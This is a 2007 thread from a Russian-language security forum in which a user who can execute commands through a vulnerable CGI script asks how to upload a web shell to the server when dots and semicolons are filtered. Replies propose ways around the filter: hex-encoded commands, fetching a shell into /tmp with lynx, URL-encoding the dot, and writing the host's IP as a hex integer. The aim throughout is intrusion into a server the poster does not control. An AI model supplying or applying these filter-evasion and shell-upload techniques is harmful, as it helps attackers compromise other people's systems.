ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

/bin/bash хелп
  #1  
Старый 04.03.2007, 17:39
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


Exclamation /bin/bash хелп

Короче есть бага в cgi скрипте могу исполнять команды но не могу использывать .
Сначало думал что это куйн но потом понял что залить шелл просто не реально.
Да ; тоже нельзя.


Вопрос как залить шелл не используя точки. на серваке есть lynx из загрузчиков.

варианты извменить точку в чего либо (url кодировку не предлогать)

записать эхом в файл без точки в 2 или 16 коде потом утилитой перекодировать и исполнить как .sh

Как реалиховать у вас есть какие то идеи?
 

  #2  
Старый 04.03.2007, 17:57
hsi
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169

Репутация: 167
По умолчанию

Если я все правильно понял (хотя не уверен), то достаточно перевести команду в hex и залить шелл, если есть права на запись.
ha.ckers.org/xss.html
 

  #3  
Старый 04.03.2007, 18:01
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

как перевести в хекс я знаю )
нужна утилита в стандартной поставке котороая могла бы текст в файле (допусти hex) преобраховать в нормальный. короче мне надо залить шелл не используя точки и точки с запятой.
 

  #4  
Старый 04.03.2007, 18:12
hsi
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169

Репутация: 167
По умолчанию

В стандартных утилитах такого, по-моему, нет. Для этого пишутся скрипты на bash или perl. Но его еще нужно туда залить.
www.computing.net/unix/wwwboard/forum/6894.html
Там несколько вариантов скриптов, переводящих hex в ascii.
 

  #5  
Старый 04.03.2007, 18:32
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496

Репутация: 519
По умолчанию

cd /tmp && lynx <url>
не выход?
 

  #6  
Старый 04.03.2007, 18:34
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

cd /tmp && lynx http://ya.ru/shell
без точек...
 

  #7  
Старый 04.03.2007, 18:38
hsi
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169

Репутация: 167
По умолчанию

А cd /tmp && lynx http://ya%2Eru/shell ?
 

  #8  
Старый 04.03.2007, 18:40
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

нет
Цитата:
варианты извменить точку в чего либо (url кодировку не предлогать)
читаем внимательней.
url приобразовываеться. и в конечном запросе .
 

  #9  
Старый 04.03.2007, 18:41
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496

Репутация: 519
По умолчанию

Прийдется преобразовывать ип домена ya.ru в что-то вроде 0x34a2462d.
Хз, других идей у меня нет...
 

  #10  
Старый 04.03.2007, 18:45
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

2Deem3n®
так скачаеться????
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Есть ли уязвимости на этом форуме? kju О Работе 4 25.07.2006 18:22
Хелп! (md5) Voodoo_People Расшифровка хешей 30 06.02.2005 09:12
АЙ НИД ХЕЛП SDA Чаты 0 13.01.2005 14:05
НАРОД пожалуйсто ХЕЛП... d0Ck Болталка 8 25.12.2004 15:00
ХЕЛП arhangel Чаты 6 29.11.2004 00:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ